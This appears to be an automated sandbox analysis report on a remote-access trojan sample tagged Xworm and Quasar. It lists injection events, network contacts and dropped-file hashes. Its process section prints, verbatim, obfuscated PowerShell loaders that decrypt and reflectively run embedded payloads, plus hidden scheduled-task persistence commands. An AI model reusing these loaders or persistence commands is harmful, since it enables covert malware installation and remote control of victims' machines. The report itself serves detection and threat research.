Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3928 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 4112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4112 wrote to memory of 356 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4112 wrote to memory of 356 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4112 wrote to memory of 1700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4112 wrote to memory of 1700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1700 wrote to memory of 380 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1700 wrote to memory of 380 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 380 wrote to memory of 4396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 380 wrote to memory of 4396 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4396 wrote to memory of 3604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4396 wrote to memory of 3604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3604 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3604 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3008 wrote to memory of 2292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3008 wrote to memory of 2292 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4396 wrote to memory of 4472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wermgr.exe
PID 4396 wrote to memory of 4472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\wermgr.exe
PID 3008 wrote to memory of 4444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3008 wrote to memory of 4444 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4444 wrote to memory of 1628 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4444 wrote to memory of 1628 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1628 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1628 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_306_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_306.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_306.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_306.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_306.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_306.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_991_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_991.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\system32\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4396" "2636" "2296" "2632" "0" "0" "2640" "0" "0" "0" "0" "0"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_991.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_991.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_991.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_991.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 traffic-collins.gl.at.ply.gg udp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp

Files

memory/4112-4-0x000001C425A40000-0x000001C425A62000-memory.dmp

memory/4112-5-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4112-6-0x000001C425930000-0x000001C425940000-memory.dmp

memory/4112-7-0x000001C425930000-0x000001C425940000-memory.dmp

memory/4112-10-0x000001C425BF0000-0x000001C425C66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qikc30dv.m3g.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4112-21-0x000001C425930000-0x000001C425940000-memory.dmp

memory/4112-26-0x000001C425BD0000-0x000001C425BD8000-memory.dmp

memory/4112-27-0x000001C425C70000-0x000001C425DB0000-memory.dmp

memory/356-37-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/356-38-0x00000172CCC70000-0x00000172CCC80000-memory.dmp

memory/356-39-0x00000172CCC70000-0x00000172CCC80000-memory.dmp

memory/356-54-0x00000172CCC70000-0x00000172CCC80000-memory.dmp

memory/356-72-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bb4d79c418d1df838dc1dfb6db57501d
SHA1 903525e7a2dac8f931e1ba2f87e1bb1dea08a867
SHA256 f1bf5360d8ede0205136292027ecff131b04d6cfd7bbb9ab146472de948c771f
SHA512 43b3c6ae5facdd7c1d59ff23b5681919252900a7c9cf16270ae51e98372648d1b67323dd1f86745266acc751c0bd8f17e7400c903a02c8f7ca5c74e450c25eee

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Roaming\startup_str_306.vbs

MD5 dc4450363ab10c9f55eaf2d492874449
SHA1 e24646e2935bac1e28d52a61d6d66137c9456bdc
SHA256 66289b23354835c32537852ad0db8b3a1577e6ceb302260b9559fa18954d894e
SHA512 679080f157f9a10aa36aa0db4b005aaed74bdb6d2fdcbcfd37f236c42be5a4b2add257757bc6012ce0f77d16e7503bfb0bc57adf6714cc84d227cc5444179619

C:\Users\Admin\AppData\Roaming\startup_str_306.bat

MD5 948386c98184781df692e5f11ff558f7
SHA1 e8619faf83446ea78e456920834579bbf71aea20
SHA256 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
SHA512 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba

memory/4396-86-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4396-90-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/4396-91-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/4396-105-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/4112-111-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4396-117-0x0000017EC89D0000-0x0000017EC8CF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat

MD5 795363cfbf5d3fca47edc4cbc247a1c0
SHA1 9374d05486b0b62977825d07f748fa03cca3c864
SHA256 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6
SHA512 c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94

memory/4396-123-0x0000017EC8ED0000-0x0000017EC8F20000-memory.dmp

memory/4396-124-0x0000017EC8FE0000-0x0000017EC9092000-memory.dmp

memory/4396-125-0x0000017EC9D60000-0x0000017EC9F22000-memory.dmp

memory/3008-130-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/3008-132-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

memory/3008-133-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

memory/3008-146-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

memory/3008-151-0x000001856BD90000-0x000001856BD98000-memory.dmp

memory/3008-152-0x000001856BED0000-0x000001856BEDC000-memory.dmp

memory/2292-161-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/2292-162-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

memory/2292-165-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

memory/2292-181-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

memory/4396-198-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/2292-201-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

memory/2292-206-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a19d2f0bbbfd0b860dd34dc7422b58b
SHA1 4334057c7d2792735d2461ffbcfa3c796f79e1c3
SHA256 7edd03ffa0d38ffbc336e31b6b1f4bbdbad99605e79f473e37362867623ae259
SHA512 018ee82f304d0f49e463cfd13bac9a2968ea543c82e7981334acf5506d2f8040eb689da8cd45b6c1ca08fa14ec47a43762525352aac33d4863bccd33fad3827e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6c59ae289c6cd378ba3c32219b44ae24
SHA1 eb064e026f4ea176716ed4ec2ede9e66f196d2aa
SHA256 fdc6f52488f057437990155aba3dd308b7ed4faee73fe7cf9d21e53b8a952cd6
SHA512 e80b7deeef7a5fe16b6aef7a894c45da1ccc79d8a5360b36a664a2a36867be3f0350a06458629f8d0e7671b4b0e0d2050efbc0cde61e068cb60a6719fb67dadc

C:\Users\Admin\AppData\Roaming\startup_str_991.vbs

MD5 31ad013b3aa57b3fbb6cb1e560d05fe7
SHA1 fd7e96db28efd6baed7cd97e90dadb8f58b0c162
SHA256 fff219810b246a986ec84d671e01e2cf55a95c27fdfae873f8eba20cd24a5dfb
SHA512 f1c95d6ac70f5bd862fd48a2e47036e48f80e7b0bf650856e4d8d8f5491d06af5364e98dd1bca50fda9a424e161c440193b312e748f0dd2fdd553f28743d1c28

memory/4396-223-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/4396-225-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/4420-227-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4420-228-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

memory/3008-230-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4420-232-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

memory/4396-233-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/3008-244-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

memory/4420-247-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

memory/4420-250-0x000001E8455F0000-0x000001E8455FE000-memory.dmp

memory/3008-254-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4396-255-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

